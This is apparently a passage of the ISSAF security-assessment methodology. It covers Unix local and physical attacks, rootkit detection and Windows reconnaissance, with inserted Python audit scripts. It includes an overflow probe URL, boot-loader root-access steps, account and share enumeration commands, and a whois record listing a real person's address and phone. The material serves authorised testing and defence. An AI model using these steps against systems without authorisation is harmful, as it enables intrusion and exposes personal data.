• http://host/cgibin/helloworld?type=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Countermeasure
• Analyze the web server logs periodically.
• Follow web application development best practices.
• Refer to the Web Application Security section of ISSAF.
E.6.14 Mail Services Attacks
[coming soon]
E.6.15 Local Attacks
Description
Local attacks are performed when someone has a non-privileged account and/or physical access to the systems. In most cases the attacker knows the security mechanisms in place and can potentially use social engineering more effectively.
E.6.16 File and Directory Permission Attacks
Description
Find and analyze world-executable shells and binaries
Find and analyze world-writable files
Find and analyze world-executable + writable files
Find and analyze SGID root files
Find and analyze SUID root files
Find and analyze sticky bit files
Gain privileges and escalate them
• Disassemble
• Overflow attacks
Perform denial of service by crashing them
Find world-executable shells and binaries
# find / -perm -1 -type f -print
Find world-writable files
# find / -perm -2 -type f -print
Find world-executable + writable files
# find / -perm -3 -type f -print
Safeguard
• No file in the system should have world-executable permissions.
• Directories should have world execute permission only as required. It is not practical for the system to function at full capacity if world execute is removed entirely, so appropriate precautions should be taken while revoking permissions.
• Always maintain checksums of all critical files:
  o /usr/bin/*.*
  o /usr/sbin/*.*
  o /sbin/*.*
  o /bin/*.*
  o /etc/*.*
  o /lib/*.*
  o Other critical files
  o Daily incremental and periodic full backups of data files
• Set the default umask to 022. It gives the owner full access to all new files (rw-r--r-- for files, rwxr-xr-x for directories) and everyone else read access.
• Set the default umask to 027. It gives new files rw-r----- (directories rwxr-x---), so only the owner and group have access.
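The find commands and the two umask rules above can be checked from one script. This is an added example, not ISSAF code: classify_mode() applies the same mode masks as the find commands, audit_tree() walks a directory the way find -type f does, and new_file_mode() shows what a given umask produces; build_sample_tree() creates a small constructed tree so the script can be run anywhere.

```python
"""Reproduce the permission checks above in one pass over a directory tree.

Added example (not ISSAF code). classify_mode() applies the same masks as
the find commands (-perm -1, -2, -3, -4000, -2000, -1000: every bit of the
mask must be set), audit_tree() runs it over regular files only (find's
-type f; symlinks are skipped), and new_file_mode() shows what a umask
yields. build_sample_tree() creates a small constructed tree for a dry run.
"""
import os
import stat
import tempfile
from typing import Dict, List, Tuple

CHECKS = (
    ("world_executable", stat.S_IXOTH),                          # find / -perm -1
    ("world_writable", stat.S_IWOTH),                            # find / -perm -2
    ("world_writable_executable", stat.S_IWOTH | stat.S_IXOTH),  # find / -perm -3
    ("setuid", stat.S_ISUID),                                    # find / -perm -4000
    ("setgid", stat.S_ISGID),                                    # find / -perm -2000
    ("sticky", stat.S_ISVTX),                                    # find / -perm -1000
)


def classify_mode(mode: int) -> List[str]:
    """Names of every check whose mask is fully set in mode."""
    return [name for name, mask in CHECKS if mode & mask == mask]


def audit_tree(root: str) -> Dict[str, List[str]]:
    results: Dict[str, List[str]] = {name: [] for name, _ in CHECKS}
    results["setuid_root"] = []   # the subset of setuid files owned by uid 0
    for dirpath, _dirnames, filenames in os.walk(root):
        for filename in sorted(filenames):
            path = os.path.join(dirpath, filename)
            try:
                st = os.lstat(path)          # lstat: never follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue                     # -type f: regular files only
            for name in classify_mode(st.st_mode):
                results[name].append(path)
            if st.st_mode & stat.S_ISUID and st.st_uid == 0:
                results["setuid_root"].append(path)
    return results


def new_file_mode(umask: int, directory: bool = False) -> str:
    """Permission string a new file (0666) or directory (0777) gets under umask."""
    base = 0o777 if directory else 0o666
    kind = stat.S_IFDIR if directory else stat.S_IFREG
    return stat.filemode(kind | (base & ~umask))[1:]


def build_sample_tree() -> Tuple[str, Dict[str, str]]:
    """Constructed tree: one world-writable file, one world-executable, one private."""
    root = tempfile.mkdtemp(prefix="permaudit-")
    modes = {"scratch.txt": 0o666, "tool.sh": 0o755, "private.cfg": 0o600}
    paths = {}
    for name, mode in modes.items():
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write("constructed sample\n")
        os.chmod(path, mode)
        paths[name] = path
    return root, paths


if __name__ == "__main__":
    root, _ = build_sample_tree()
    for check, paths in audit_tree(root).items():
        print(f"{check:26s} {paths}")
    for umask in (0o022, 0o027):
        print(f"umask {umask:03o}: file {new_file_mode(umask)}  dir {new_file_mode(umask, True)}")
```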
E.6.17 Symlink Attacks
Description
3. SUID/SGID files kill
3.1. Find SUID root files
find / -perm -4000 -exec ls -al {} \;
3.2. Find SGID root files
find / -perm -2000 -exec ls -al {} \;
3.3. Find sticky bit files
find / -perm -1000 -exec ls -al {} \;
Find SUID root files
[balwant@localhost balwant]$ find / -perm -4000 -exec ls -al {} \;
-rwsr-xr-x 1 root bin    1303552 May  6 10:39 /usr/openwin/bin/Xsun
-rwsr-xr-x 1 root bin      74716 Aug  5  2003 /usr/openwin/bin/xlock
-r-sr-xr-x 1 root bin      38056 Sep 21  2002 /usr/openwin/bin/sys-suspend
-rwsr-sr-x 1 root bin      22868 May 28 02:49 /usr/openwin/bin/kcms_configure
-rwsr-sr-x 1 root bin      94632 May 28 02:53 /usr/openwin/bin/kcms_calibrate
-rwsr-xr-x 1 root bin     295400 Mar 19  2004 /usr/openwin/bin/xscreensaver
-rwsr-xr-x 1 root bin      23180 Oct 17  2002 /usr/openwin/lib/mkcookie
-r-sr-xr-x 1 root sys      13748 Jun 17 02:13 /usr/bin/i86/newtask
-r-sr-xr-x 2 root bin      11272 Nov  4  2002 /usr/bin/i86/uptime
-r-sr-xr-x 2 root bin      11272 Nov  4  2002 /usr/bin/i86/w
-rwsr-xr-x 1 root sys      35684 Dec 14  2002 /usr/bin/at
-rwsr-xr-x 1 root sys      13916 Nov  4  2002 /usr/bin/atq
-rwsr-xr-x 1 root sys      12528 Nov  4  2002 /usr/bin/atrm
-r-sr-xr-x 1 root bin      17776 Feb 25  2004 /usr/bin/crontab
-r-sr-xr-x 1 root bin      14012 Nov  4  2002 /usr/bin/eject
-r-sr-xr-x 1 root bin      25704 Nov  4  2002 /usr/bin/fdformat
-r-sr-xr-x 1 root bin      28344 Nov  4  2002 /usr/bin/login
-rwsr-xr-x 1 root sys       7420 Nov  4  2002 /usr/bin/newgrp
-r-sr-sr-x 1 root sys      22168 Nov  4  2002 /usr/bin/passwd
-r-sr-xr-x 1 root bin       9732 Oct 30  2003 /usr/bin/pfexec
-r-sr-xr-x 1 root sys      21808 May 11 11:43 /usr/bin/su
-r-s--x--x 1 uucp bin      51452 Nov  4  2002 /usr/bin/tip
-r-s--x--x 1 root sys    2992340 Jul 31  2003 /usr/bin/admintool
-r-s--x--x 1 root lp        9728 May 12 03:58 /usr/bin/cancel
-r-s--x--x 1 root lp       23204 May 12 03:58 /usr/bin/lp
-r-s--x--x 1 root lp        9772 May 12 03:58 /usr/bin/lpset
-r-s--x--x 1 root lp       22432 May 12 03:58 /usr/bin/lpstat
-r-sr-xr-x 1 root bin      20620 Feb 26  2003 /usr/bin/rcp
-r-sr-xr-x 1 root bin      52024 Nov  4  2002 /usr/bin/rdist
-r-sr-xr-x 1 root bin      14968 Nov  4  2002 /usr/bin/rlogin
-r-sr-xr-x 1 root bin       9004 Nov  4  2002 /usr/bin/rsh
-r-sr-xr-x 1 root sys      39628 Nov  4  2002 /usr/bin/chkey
-r-sr-xr-x 1 root bin       4644 Nov  4  2002 /usr/bin/mailq
-r-sr-xr-x 1 root bin      39444 Nov 12  2003 /usr/bin/rmformat
-r-sr-xr-x 1 root bin       6044 Nov  4  2002 /usr/bin/volcheck
-r-sr-xr-x 1 root bin      12584 Nov  4  2002 /usr/bin/volrmmount
-r-sr-xr-x 1 root bin     215296 Apr  2  2004 /usr/bin/pppd
---s--x--x 1 root uucp     66892 Nov  4  2002 /usr/bin/ct
---s--x--x 1 uucp uucp     78840 Nov  4  2002 /usr/bin/cu
---s--x--x 1 uucp uucp     67812 Aug 14  2003 /usr/bin/uucp
---s--x--x 1 uucp uucp     24208 Nov  4  2002 /usr/bin/uuglist
---s--x--x 1 uucp uucp     20332 Nov  4  2002 /usr/bin/uuname
---s--x--x 1 uucp uucp     60676 Nov  4  2002 /usr/bin/uustat
---s--x--x 1 uucp uucp     71516 Nov  4  2002 /usr/bin/uux
-rwsr-xr-x 1 root bin      56264 Apr 12 15:47 /usr/bin/cdrw
-r-sr-xr-x 1 root bin      14172 Aug 13  2003 /usr/lib/fs/ufs/quota
-r-sr-xr-x 1 root bin      83820 Apr 12 15:30 /usr/lib/fs/ufs/ufsdump
-r-sr-xr-x 1 root bin     968804 Apr 12 15:30 /usr/lib/fs/ufs/ufsrestore
---s--x--x 1 root bin       4820 Nov  4  2002 /usr/lib/pt_chmod
-r-sr-xr-x 1 root bin       7604 Apr 22  2003 /usr/lib/utmp_update
-r-s--x--x 1 root bin      19864 May 12 03:58 /usr/lib/lp/bin/netpr
-r-s--x--x 1 root bin      26160 Apr 27 00:48 /usr/lib/print/lpd-port
-rwsr-xr-x 1 root adm       5400 Nov  4  2002 /usr/lib/acct/accton
---s--x--x 1 uucp uucp      6492 Nov  4  2002 /usr/lib/uucp/remote.unknown
---s--x--x 1 uucp uucp    159528 Nov  4  2002 /usr/lib/uucp/uucico
---s--x--x 1 uucp uucp     33408 Nov  4  2002 /usr/lib/uucp/uusched
---s--x--x 1 uucp uucp     83884 Nov  4  2002 /usr/lib/uucp/uuxqt
-r-sr-xr-x 1 root bin      11992 Nov  4  2002 /usr/sbin/i86/whodo
-rwsr-xr-x 3 root bin      16160 Apr  2  2003 /usr/sbin/allocate
-rwsr-xr-x 1 root sys      23480 Nov  4  2002 /usr/sbin/sacadm
-r-sr-xr-x 1 root bin      33148 Apr 13 02:00 /usr/sbin/traceroute
-rwsr-xr-x 3 root bin      16160 Apr  2  2003 /usr/sbin/deallocate
-rwsr-xr-x 3 root bin      16160 Apr  2  2003 /usr/sbin/list_devices
-r-sr-xr-x 1 root bin      43788 Apr 13 06:26 /usr/sbin/ping
-r-sr-xr-x 1 root bin      26052 Mar 24  2004 /usr/sbin/pmconfig
-r-s--x--x 1 root lp        7416 May 12 03:58 /usr/sbin/lpmove
-r-sr-xr-x 1 root bin     726088 Nov  4  2002 /usr/sbin/static/rcp
-r-sr-sr-x 1 root sys      23092 Sep 21  2002 /usr/dt/bin/dtaction
-r-sr-xr-x 1 root bin      32872 Sep 21  2002 /usr/dt/bin/dtappgather
-r-sr-sr-x 1 root daemon   288084 Sep 21  2002 /usr/dt/bin/sdtcm_convert
-r-sr-xr-x 1 root bin     349604 Jan 11  2003 /usr/dt/bin/dtprintinfo
-r-sr-xr-x 1 root bin     154544 Apr 15 18:30 /usr/dt/bin/dtsession
[balwant@localhost balwant]$ find / -perm -2000 -exec ls -al {} \;
-r-xr-sr-x 1 root sys      13540 Nov  4  2002 /usr/platform/i86pc/sbin/eeprom
-rwxr-sr-x 1 root root   1474468 Mar 16  2004 /usr/openwin/bin/Xprt
-rwxr-sr-x 1 root root    312936 Oct 17  2002 /usr/openwin/bin/lbxproxy
-rwsr-sr-x 1 root bin      22868 May 28 02:49 /usr/openwin/bin/kcms_configure
-rwsr-sr-x 1 root bin      94632 May 28 02:53 /usr/openwin/bin/kcms_calibrate
-r-x--s--x 1 root mail     66256 Dec 14  2002 /usr/bin/mail
-r-x--s--x 1 root mail    118064 Nov  4  2002 /usr/bin/mailx
-r-xr-sr-x 1 root sys      59700 Nov  4  2002 /usr/bin/netstat
-r-sr-sr-x 1 root sys      22168 Nov  4  2002 /usr/bin/passwd
-r-xr-sr-x 1 root tty      11612 Nov  4  2002 /usr/bin/write
-r-xr-sr-x 1 root smmsp   872332 Sep 25  2003 /usr/lib/sendmail
-r-xr-sr-x 1 root sys      22064 Nov  4  2002 /usr/sbin/i86/prtconf
-r-xr-sr-x 1 root sys      10528 Nov  4  2002 /usr/sbin/i86/swap
-r-xr-sr-x 1 root sys      22056 Nov  4  2002 /usr/sbin/i86/sysdef
-r-xr-sr-x 1 root tty      10036 Mar 26  2003 /usr/sbin/wall
-r-sr-sr-x 1 root sys      23092 Sep 21  2002 /usr/dt/bin/dtaction
-r-sr-sr-x 1 root daemon   288084 Sep 21  2002 /usr/dt/bin/sdtcm_convert
-r-xr-sr-x 1 root mail   1458996 May  4 19:17 /usr/dt/bin/dtmail
-r-xr-sr-x 1 root mail    445972 Jan 11  2003 /usr/dt/bin/dtmailpr
E.6.18 System Call Attacks
The main difference between a normal rootkit and an LKM rootkit is simple: normal rootkits replace system utilities so that the attacker can hide files, processes and network connections. An LKM rootkit, on the other hand, does something a bit more interesting: it replaces the location of system calls, changing the original memory addresses to something else, and at that different location there is a trojanized version of the system call. So it does not need to modify utilities (or libraries); it simply replaces what those utilities and libraries use! Rootkits of this sort go by names such as Rkit and Adore LKM, to mention a couple of the most common ones.
Here is a list of the typically modified system calls: sys_clone, sys_close, sys_execve, sys_fork, sys_ioctl, sys_kill, sys_mkdir, sys_read, sys_readdir, sys_write.
The only way an LKM rootkit can be detected is by analyzing kernel memory directly. One way to do this is to compare system call addresses (recall that LKM rootkits change them). This task can be performed easily with tools such as kstat, which reads kernel memory through /dev/kmem. kstat provides information on running processes via its '-P' switch, including hidden processes; compare its output with what "ps aef" tells you. Additionally, you can query a specific process id with the '-p' parameter. To analyze system call addresses, specify the '-s' switch. After the initial system installation and full configuration, record the "kstat -s" output. The memory addresses there are the correct values you can compare against from time to time. Lines with a WARNING show the possibility that your system has been compromised. kstat can also act as a replacement for lsmod with the '-M' switch; you will be able to see the trojan kernel module on the list.
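The baseline comparison described above can be scripted so that the recorded table is diffed automatically. This is an added example, not ISSAF code or kstat's own logic: it assumes a simple "name address" line format and made-up addresses (both constructed), and additionally flags any entry whose address lies outside an assumed static kernel text range, which is where a module-provided replacement would live.

```python
"""Diff a recorded system-call address table against a fresh one.

Added example (not ISSAF code). It implements the check described above:
record the addresses once after installation, then compare later output with
that baseline and warn on any change. The input format assumed here is one
'<syscall> <hex address>' pair per line (constructed; adapt parse_syscall_table()
to the exact output of kstat -s or whatever tool you use). Addresses are made up.
"""
from typing import Dict, List, Optional, Tuple


def parse_syscall_table(text: str) -> Dict[str, int]:
    table: Dict[str, int] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        parts = line.split()
        if len(parts) < 2 or not parts[1].lower().startswith("0x"):
            continue
        table[parts[0]] = int(parts[1], 16)
    return table


def compare_tables(baseline: Dict[str, int], current: Dict[str, int],
                   text_range: Optional[Tuple[int, int]] = None) -> List[Dict]:
    """Report syscalls whose address changed, vanished, appeared or left kernel text.

    text_range is [start, end) of the static kernel text; an entry pointing
    outside it (into module/vmalloc space) is suspicious even with no baseline.
    """
    findings = []
    for name in sorted(set(baseline) | set(current)):
        base, now = baseline.get(name), current.get(name)
        if now is None:
            findings.append({"syscall": name, "status": "MISSING", "baseline": base})
            continue
        outside = text_range is not None and not (text_range[0] <= now < text_range[1])
        if base is None:
            findings.append({"syscall": name, "status": "NEW", "address": now,
                             "outside_text": outside})
        elif base != now or outside:
            findings.append({"syscall": name, "status": "WARNING", "baseline": base,
                             "address": now, "outside_text": outside})
    return findings


# Constructed baseline recorded "after installation"; the calls listed are the
# ones the section names as typically hooked by an LKM rootkit.
BASELINE = """\
sys_clone    0xc0105c70
sys_close    0xc0130e90
sys_execve   0xc0106f40
sys_fork     0xc0105c20
sys_ioctl    0xc013a5b0
sys_kill     0xc011e3a0
sys_mkdir    0xc0135120
sys_read     0xc01311f0
sys_readdir  0xc013c8e0
sys_write    0xc0131290
"""
# Constructed later snapshot: two entries now point into module address space
CURRENT = (BASELINE
           .replace("sys_read     0xc01311f0", "sys_read     0xc883a1c0")
           .replace("sys_readdir  0xc013c8e0", "sys_readdir  0xc883a3f0"))
KERNEL_TEXT = (0xC0100000, 0xC0400000)   # constructed static-text range


def audit(baseline_text: str, current_text: str) -> List[Dict]:
    return compare_tables(parse_syscall_table(baseline_text),
                          parse_syscall_table(current_text), KERNEL_TEXT)


if __name__ == "__main__":
    for finding in audit(BASELINE, CURRENT):
        print(finding["status"], finding["syscall"], hex(finding.get("address", 0)),
              "outside kernel text" if finding.get("outside_text") else "")
```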
For more information regarding rootkits, check out the following sites and documents:
www.chkrootkit.org/ Documentation Section
Detecting and Understanding Rootkits, by Arturo 'Buanzo' Busleiman, President, OISSG.Ar http://www.buanzo.com.ar/sec/Rootkits.html
E.6.19 Race Conditions
A race condition is an undesirable situation that occurs when a device or system
attempts to perform two or more operations at the same time, but because of the nature
of the device or system, the operations must be done in the proper sequence in order to
be done correctly.
Race conditions can arise in threads, files or any other form of resource which is
accessed by multiple operations.
For example:
A multi-threaded race condition in the processing of incoming RPC requests. Due to a
flaw in the software, two separate threads may attempt to process the same incoming
RPC request. One of the threads may free the memory allocated to hold the incoming
packet before the other thread is finished processing the packet. As a result, a memory
error may occur.
E.6.20 Key Logger Attacks
There are keyloggers for GNU+Linux that are LKM based (see "System Call Attacks").
In this case, the sys_read() system call is intercepted. If the file descriptor is the standard
input (0 or stdin) and just one byte is read, then we have a keystroke. It is not usually a
good approach to install LKM tools (rootkits, key loggers, process hiders), as they often
modify the system behaviour in such a way that even a luser can see it. As a simple
countermeasure, system administrators or deployers can build a custom kernel without
the ability to load kernel modules.
E.6.21 Physical Security Assessment
1. Use the boot loader to start into single user mode, gain root access and change the
password, or, if it is a Linux system, use the "init=/bin/sh" kernel parameter if you can
edit the boot loader command line.
2. Boot from secondary storage media into another operating system, mount the target's
disks and gain privileged access. Take into account the target's filesystem type if you
need write access.
Global Countermeasure[s]
1. Implement physical security. For details, refer to the physical security section.
2. Implement BIOS Passwords
3. Boot loader password e.g. Grub, Lilo
4. Boot sequences should not contain CD Drive and floppy drive to retain the
functionality and keep secure (complement with BIOS passwords).
Further Reading[s]
Google search for: "I lost my root password" or similar. Data recovery related searches
will prove useful, too.
F WINDOWS SYSTEM SECURITY ASSESSMENT
F.1 DESCRIPTION
To understand the security implementation of the NT family, we will have to understand
the following terms.
Executive
The executive is the only part of the system that executes in kernel mode, and is divided
into three levels. The lowest level is called HAL, which provides an abstract view of the
underlying machine architecture. The motive for having this layer is to make the system
(more) portable.
Protected Subsystems
A protected subsystem provides an Application Programming Interface (API) which
programs can call. Such protected subsystems are sometimes called servers, or
protected servers, and are executed in user mode as processes with certain privileges.
When an application calls an API routine, a message is routed to the server
implementing the API routine via the LPC facility. Later, the server replies by sending a
message back to the caller. Trusted Computing Base (TCB) servers are protected
servers which execute as a process with a SYSTEM security context, which implies that
the process possesses an access token.
Token for processes running within the SYSTEM security context

Field            SYSTEM Token Value
User ID          SYSTEM
Group ID array   Everyone, Administrators
Owner ID         Points to Administrator group ID
Privilege(s)     TCB (enabled), CreateToken (disabled), TakeOwnership (disabled),
                 CreatePageFile (enabled), LockMemory (enabled),
                 AssignPrimaryToken (disabled), IncreaseQuota (disabled),
                 IncreaseBasePriority (enabled), CreatePermanent (enabled),
                 Debug (enabled), Audit (enabled), Security (disabled),
                 SystemEnvironment (disabled), ChangeNotify (enabled),
                 Backup (disabled), Restore (disabled), Shutdown (disabled),
                 LoadDriver (disabled), ProfileSingleProcess (enabled),
                 Systemtime (disabled)
Default DACL     SYSTEM: GENERIC ALL; Everyone: GENERIC EXECUTE
Source           Not used for SYSTEM token
Type             Primary
We will describe some of the standard servers including: Session Manager, WinLogon,
Win32, LSA, and SAM.
Session Manager: is the first server to start in an NT system. It is responsible for loading
DOS device drivers and the subsystems registered in the Registry, and for initialization of
Dynamic Link Libraries (DLLs), after which it starts the WinLogon server.
WinLogon: is the logon process. It is responsible for coordinating and providing
interfaces for interactive logon/logoff. Moreover, it manages the Desktops. WinLogon
registers itself with Win32, during system initialization as the logon process.
Win32: makes Microsoft’s 32-bit Windows API available to application programs. In
addition, it provides the graphical user interface and controls all user input and output.
Only two objects are exported from this server, Window Station, i.e. user input/output
system (mouse, keyboard and screen), and a Desktop object.
LSA (Local Security Authority): has its main responsibilities centered on security. It plays
a major part in the logon process and the security event logging process, as well as
upholding the security policy of the local system. The security policy is implemented by
the local security policy database, which keeps information on trusted domains, privileges
and access rights for users and user groups, and security events. This database is
managed by LSA and accessed only through LSA.
SAM (Security Accounts Manager): is responsible for managing information about
accounts for users and user groups, either locally or domain wide depending on its role. It
also provides support for the authentication package. The secure accounts are stored as
sub-objects in a database in the registry. This database is accessed and managed only
by SAM.
F.2 PURPOSE
See Windows NT/2000 systems from the attacker's point of view, using the attacker's tools.
F.3 REQUIREMENT
[Text]
F.3.1 Understand Organization’s environment
F.3.2 Technical Requirements
F.4 TERMINOLOGY
[Text]
F.5 HISTORY
[Text]
F.6 OBJECTIVE
• Understanding Windows Security issues and safeguarding them
• Following a structured approach for Windows system penetration/audit
• Gaining Access and privilege escalation
• Going beyond root and spreading the attack further
F.7 EXPECTED RESULT
• List of live hosts
• Processes running on hosts
• List of users/shares
• Version of kernel used in operating systems and their patch level
• Vendor of operating system
• List of vulnerabilities
• List of compromised hosts
F.8 METHODOLOGY / PROCESS
Brief Intro and Table of Contents
F.8.1 Information Gathering
[Text]
F.8.2 Passive Information Gathering
Gather information from publicly available sources. There are a lot of public sites
which compile a lot of sensitive information; let's see some of them:
F.8.2.1 WHOIS
Description
Whois is a program that will tell you the owner of any second-level domain name or IP
address.
Pre-requisite[s]
A web browser or a command-line whois client for Windows
Steps to be performed
Guess target domain name and target IP address and IP range
Examples/Results
http://whois.sc/oissg.org
C:\>whois 212.13.208.91
% This is the RIPE Whois secondary server.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

inetnum:      212.13.208.0 - 212.13.211.255
netname:      JUMP-BYTEMARK
descr:        Bytemark Computer Consulting
country:      GB
admin-c:      MATB-RIPE
tech-c:       MATB-RIPE
status:       ASSIGNED PA
mnt-by:       JUMP-MNT
mnt-lower:    JUMP-MNT
source:       RIPE
changed:      james_r-ripe@jump.org.uk 20030902
changed:      james_r-ripe@jump.org.uk 20040220

route:        212.13.192.0/19
descr:        Jump Networks Ltd. /19 PA
origin:       AS8943
mnt-by:       JUMP-MNT
source:       RIPE
changed:      jon@knx.net.uk 20000925
changed:      james_r-ripe@jump.org.uk 20030131

person:       Matthew Bloch
address:      28, Montague Street
address:      York
address:      YO23 1JB
address:      ENGLAND
phone:        +44 8707 455026
e-mail:       matthew@bytemark.co.uk
nic-hdl:      MATB-RIPE
mnt-by:       JUMP-MNT
source:       RIPE
changed:      james_r-ripe@jump.org.uk 20030112
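A parser for the RPSL "attribute: value" format the RIPE server returns above, as an added example that is not part of ISSAF: it splits the response into objects, keeps repeated attributes (address, changed, mnt-by) as lists, and summarises the address ranges, origin AS and contacts an assessor records. The response text is constructed with documentation addresses, not the real record shown above.

```python
from typing import Dict, List, Tuple

# Constructed response in the same RPSL layout as the whois output above;
# ranges, handles and the person are illustrative values, not real data.
SAMPLE_WHOIS = """\
% This is the RIPE Whois secondary server.
% The objects are in RPSL format.

inetnum:        192.0.2.0 - 192.0.2.255
netname:        EXAMPLE-NET
descr:          Example Hosting Ltd
country:        GB
admin-c:        EXAM1-RIPE
tech-c:         EXAM1-RIPE
status:         ASSIGNED PA
mnt-by:         EXAMPLE-MNT
source:         RIPE

route:          192.0.2.0/24
descr:          Example Hosting /24 PA
origin:         AS64496
mnt-by:         EXAMPLE-MNT
source:         RIPE

person:         Jane Example
address:        1 Example Street
address:        Exampletown
phone:          +44 1632 960000
e-mail:         jane@example.net
nic-hdl:        EXAM1-RIPE
source:         RIPE
"""

RpslObject = Dict[str, List[str]]


def parse_rpsl(text: str) -> List[RpslObject]:
    """Split a whois response into RPSL objects.

    Objects are separated by blank lines and '%' lines are server comments.
    Values are kept as lists because attributes such as 'address', 'changed'
    and 'mnt-by' legitimately repeat inside one object; a line starting with
    whitespace continues the previous attribute's value.
    """
    objects: List[RpslObject] = []
    current: RpslObject = {}
    last_key = None
    for raw in text.splitlines():
        line = raw.rstrip()
        if line.startswith("%") or line.startswith("#"):
            continue
        if not line:
            if current:
                objects.append(current)
                current, last_key = {}, None
            continue
        if line[0].isspace() and last_key:
            current[last_key][-1] += " " + line.strip()
            continue
        key, sep, value = line.partition(":")
        if not sep:
            continue
        key = key.strip().lower()
        current.setdefault(key, []).append(value.strip())
        last_key = key
    if current:
        objects.append(current)
    return objects


def object_class(obj: RpslObject) -> str:
    """The object class (inetnum, route, person, ...) is its first attribute."""
    return next(iter(obj))


def contacts_for_handle(objects: List[RpslObject], handle: str) -> List[RpslObject]:
    """Resolve an admin-c/tech-c handle to the person objects carrying that nic-hdl."""
    return [o for o in objects if o.get("nic-hdl", [None])[0] == handle]


def summarize(objects: List[RpslObject]) -> Dict[str, list]:
    """Inventory what the response reveals: address ranges, routes, ASNs, people."""
    summary: Dict[str, list] = {"inetnum": [], "route": [], "origin": [], "contacts": []}
    for o in objects:
        cls = object_class(o)
        if cls in ("inetnum", "route"):
            summary[cls].extend(o[cls])
        if cls == "route":
            summary["origin"].extend(o.get("origin", []))
        if cls == "person":
            summary["contacts"].append((o["person"][0], o.get("e-mail", [""])[0]))
    return summary
```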
Analysis/Conclusion/Observation
Tool[s]
http://whois.sc/domain.com
http://www.samspade.org
http://www.geektools.com
http://www.ripe.net/whois
http://ws.arin.net/cgi-bin/whois.pl
http://allwhois.com/home.html
command-line Win32 & Linux whois
Countermeasures
Further Reading[s]
http://www.faqs.org/rfcs/rfc954.html
http://www.faqs.org/rfcs/rfc1714.html
Remarks
F.8.2.2 SEARCH ENGINES
Description
A search engine indexes a lot of Internet pages and permits advanced search functions that
will help you in your search job.
Pre-requisite[s]
Target domain name
All the information about the target you can obtain
Steps to be performed
Try different advanced searches with all the keys you have.
Analyze the results carefully and run further searches based on what they reveal.
Examples/Results
http://www.google.es/search?q=allinurl:oissg.org&num=50&hl=es&lr=&ie=UTF-8&filter=0
http://www.google.es/search?num=50&hl=es&ie=UTF-8&q=balwant@oissg.org&meta=
http://www.google.es/search?q=allintext:balwant+%2B%40+oissg+%2B.+org&num=50&hl=es&lr=&ie=UTF-8&as_qdr=all&filter=0
http://www.google.es/search?num=50&hl=es&lr=&ie=UTF8&as_qdr=all&q=%22212.13.208.91%22
Analysis/Conclusion/Observation
Search engines are among the most powerful tools for gathering information: if you want
to attack a target you have to know all you can about it. This stage is very important for
getting the maximum possible data, and you can spend as much time on it as you can
afford, as the information gathered here will be very useful in further attacks. Sometimes
it also provides new avenues for attackers to enter.
Tool[s]
http://www.google.com
http://www.yahoo.com
http://www.dogpile.com (very useful for cumulative search)
http://www.kartoo.com (useful in visualizing the links )
all the search engines and tools
Countermeasures
Refer ISSAF methodology section for countermeasures
Further Reading[s]
http://johnny.ihackstuff.com
http://www.buyukada.co.uk/projects/athena/
Remarks
F.8.3 Active Information Gathering
This method of gathering information is based on actively querying a target machine so
you can learn more about it. Basically, there are two types of targets: domain controllers
(DCs), from which we can obtain information about the whole domain, and standalone
servers or workstations, from which we can obtain information only about that PC. It is
important to note that if you can get some information or a password from one standalone
machine, it is likely that other machines in the same IP range have the same password or
information.
You can gather information actively following the next steps:
1. Enumeration Attack
   • Identify Users
   • Identify Shares
   • Identify Policies
   • Enumerate Registry
   • NETBIOS enumeration
     o Netbios Name enumeration
     o Netbios Session enumeration
   • MIB Enumeration
     o SNMPwalk
     o SNMPget
2. Identify Master Browsers
3. Identify Domains on the Network
4. Identify Domain Controllers
5. Identify Hosts of Domain
6. View Domain Membership
F.8.3.1 IDENTIFY USERS
Description
If the target machine is a DC, the list of users will be the list of users of the entire domain,
but if the target is a stand-alone machine you can only obtain a list of the target's own users.
Pre-requisite[s]
Ports 135/TCP to 139/TCP or 445/TCP have to be reachable. The target machine has to
have the Server service started and working.
Steps to be performed
Run enum with the following flags.
C:\>enum -UMNSPGL target_ip
Examples/Results
Using enum.exe (http://www.bindview.com/Resources/RAZOR/Files/enum.tar.gz):
“Example HERE”
Using ADSI, create the script userlist.vbs with the following contents:
' Bind to the domain (or stand-alone machine) through the WinNT ADSI provider
sDomain = "YourDomain"
Set oDomain = GetObject("WinNT://" & sDomain)
' Enumerate only user objects, not groups, services or computers
oDomain.Filter = Array("User")
For Each oADobject In oDomain
    WScript.Echo oADobject.Name & vbTab & oADobject.FullName & vbTab & _
        oADobject.Description & vbTab & oADobject.HomeDirDrive & vbTab & _
        oADobject.HomeDirectory
Next
Analysis/Conclusion/Observation
An attacker was able to obtain the server accounts and can use password attack
techniques to guess the password of these accounts.
Countermeasures
Restrict anonymous access to your registry and public access to ports 135-139 & 445.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous=2
Tool[s]
http://www.bindview.com/Resources/RAZOR/Files/enum.tar.gz
Further Reading[s]
http://support.microsoft.com/default.aspx?scid=http://support.microsoft.com:80/support/kb/articles/Q246/2/61.ASP&NoWebContent=1
Remarks
F.8.3.2 IDENTIFY SHARES
Description
Shared directories can be visible or hidden (a $ at the end of the share name hides it).
Pre-requisite[s]
Ports 135/TCP and 139/TCP or 445/TCP have to be reachable.
The target machine has to have the Server service started and working.
Steps to be performed
Examples/Results
Using “NET VIEW” to view only visible shares:
C:\>net view \\workstation
Recursos compartidos en \\workstation

